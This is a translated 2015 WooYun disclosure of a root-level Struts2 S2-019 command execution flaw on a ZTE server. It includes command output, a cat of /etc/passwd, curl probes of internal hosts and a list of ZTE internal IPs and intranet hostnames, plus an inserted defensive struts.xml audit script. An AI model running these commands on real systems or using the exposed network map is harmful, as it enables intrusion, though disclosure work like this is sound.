
Vulnerability summary

Defect ID: wooyun-2015-0150400

Vulnerability title: A ZTE server has a remote command execution vulnerability (can pass through the perimeter firewall and reach the internal network)

Affected vendor: ZTE Corporation (中兴通讯股份有限公司)

Vulnerability author: hecate

Submitted: 2015-10-29 19:46

Fixed: 2015-12-14 09:22

Published: 2015-12-14 09:22

Vulnerability type: command execution

Severity: high

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org



Vulnerability details

Disclosure status:

2015-10-29: details sent to the vendor, awaiting vendor response
2015-10-30: vendor has confirmed; details disclosed to the vendor only
2015-11-09: details disclosed to core white hats and relevant domain experts
2015-11-19: details disclosed to regular white hats
2015-11-29: details disclosed to intern white hats
2015-12-14: details disclosed to the public

Brief description:

A ZTE server has a remote command execution vulnerability (can pass through the perimeter firewall and reach the internal network)

Detailed description:

The endpoint http://media.moa.zte.com.cn/mpp/MsgView.action is vulnerable to remote command execution (S2-019), and the commands run as root.

Useage: S2-019 
Whoami: root
WebPath: /home/mpp/mpp/


From here anything can be done; for example:

ifconfig
========================================================================================
eth0 Link encap:Ethernet HWaddr 00:50:56:95:69:1A
inet addr:10.30.7.188 Bcast:10.30.255.255 Mask:255.255.0.0
inet6 addr: fe80::250:56ff:fe95:691a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1014612456 errors:0 dropped:0 overruns:0 frame:0
TX packets:69261279 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:89057411709 (82.9 GiB) TX bytes:42866600899 (39.9 GiB)
eth9 Link encap:Ethernet HWaddr 00:50:56:95:E1:02
inet addr:10.3.38.71 Bcast:10.3.38.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe95:e102/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:156889875 errors:0 dropped:0 overruns:0 frame:0
TX packets:141490610 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:34097163769 (31.7 GiB) TX bytes:48721795888 (45.3 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:3332551 errors:0 dropped:0 overruns:0 frame:0
TX packets:3332551 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3960736553 (3.6 GiB) TX bytes:3960736553 (3.6 GiB)


cat /etc/resolv.conf
========================================================================================
# Generated by NetworkManager
nameserver 10.30.1.10
cat /etc/hosts
========================================================================================
127.0.0.1 MPPPRODDB1
::1 MPPPRODDB1


cat /etc/passwd
========================================================================================


Some internal-network servers are reachable (10.30.4.22 answers with the JBoss Application Server default page):

curl 10.30.4.22
========================================================================================


It also reaches the HR Online (人事在线) system, whose login page is returned:

curl hr.zte.com.cn/hronline/login.aspx
=======================================================================================


Proof of vulnerability:

Below are the internal-network probe results (the probing was somewhat slow):

192.168.170.51 http://job.zte.com.cn/cn/
192.168.170.56 https://moa.zte.com.cn/Application/MainFrame/Login.aspx?method=GET
192.168.170.60 http://prm.zte.com.cn
192.168.170.77 http://epmhk01.zte.com.cn/PME/webprojLogin.jsp
192.168.170.103 http://citrix.zte.com.cn
10.30.6.17 http://itsm.zte.com.cn/arsys
10.30.7.75 http://itop.zte.com.cn
10.30.1.212 http://visa.zte.com.cn
10.30.1.210 http://pal.zte.com.cn
10.30.1.174 http://hr.zte.com.cn/hronline/login.aspx
10.30.1.228 http://ecc.zte.com.cn/ecc/login.do

Remediation:

Apply the patch.

Copyright notice: please credit the source when reposting: hecate@WooYun
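The remediation above is just "apply the patch". As an added example that is not part of the report, here is a small audit of a struts.xml file for the S2-019 condition the report's tool output names: before Struts 2.3.15.2 the Dynamic Method Invocation constant defaulted to true, and the advisory's mitigation is to upgrade (2.3.15.2 disables it by default) or set the constant to false explicitly. The package, action and class names in the embedded samples are constructed placeholders.

```python
import xml.etree.ElementTree as ET

DMI_CONSTANT = "struts.enable.DynamicMethodInvocation"

# Constructed struts.xml fragments (not from the report). Before Struts 2.3.15.2
# the DMI constant defaulted to true, so a file that never sets it is just as
# exposed as one that sets it to true; S2-019's mitigation is to set it to false
# (or upgrade to 2.3.15.2+, where false is the default).
WEAK_STRUTS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<struts>
  <package name="mpp" extends="struts-default">
    <action name="MsgView" class="example.MsgViewAction">
      <result>/msgview.jsp</result>
    </action>
  </package>
</struts>"""

HARDENED_STRUTS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<struts>
  <constant name="struts.enable.DynamicMethodInvocation" value="false"/>
  <package name="mpp" extends="struts-default">
    <action name="MsgView" class="example.MsgViewAction">
      <result>/msgview.jsp</result>
    </action>
  </package>
</struts>"""


def dmi_setting(struts_xml, default=True):
    """Return the effective value of the DMI constant in a struts.xml document.

    `default` is what the framework assumes when the constant is absent:
    True for Struts < 2.3.15.2, False from 2.3.15.2 on. The last <constant>
    with that name wins, mirroring how Struts overrides repeated constants.
    """
    root = ET.fromstring(struts_xml)
    value = default
    for const in root.iter("constant"):
        if const.get("name") == DMI_CONSTANT:
            value = const.get("value", "").strip().lower() == "true"
    return value


def s2_019_findings(struts_xml, struts_version_fixed=False):
    """Flag a config that leaves DMI on; returns a list of human-readable findings."""
    findings = []
    if dmi_setting(struts_xml, default=not struts_version_fixed):
        findings.append(f"{DMI_CONSTANT} is effectively true: set it to false (S2-019)")
    return findings
```

The report also shows the web application running as root; running the servlet container under an unprivileged service account bounds what any future command execution can reach.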


Vulnerability response

Vendor response:

Severity: high

Vulnerability Rank: 12

Confirmed: 2015-10-30 09:20

Vendor reply:

Thanks for your attention to ZTE's security.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2015-10-29 20:01 | if、so, certified white hat ( core white hat | Rank:1052 vulnerabilities:94 | You still have to have a dream; what if it comes true? )

    Zhuzhuxia (猪猪侠) style

  2. 2015-10-29 20:37 | hecate ( regular white hat | Rank:569 vulnerabilities:89 | ®Senior Security Engineer | WooYun certified √ )

    @if、so Just copying the recipe

  3. 2015-10-29 20:47 | qhwlpg ( regular white hat | Rank:245 vulnerabilities:63 | Devoted to code auditing. )

    mark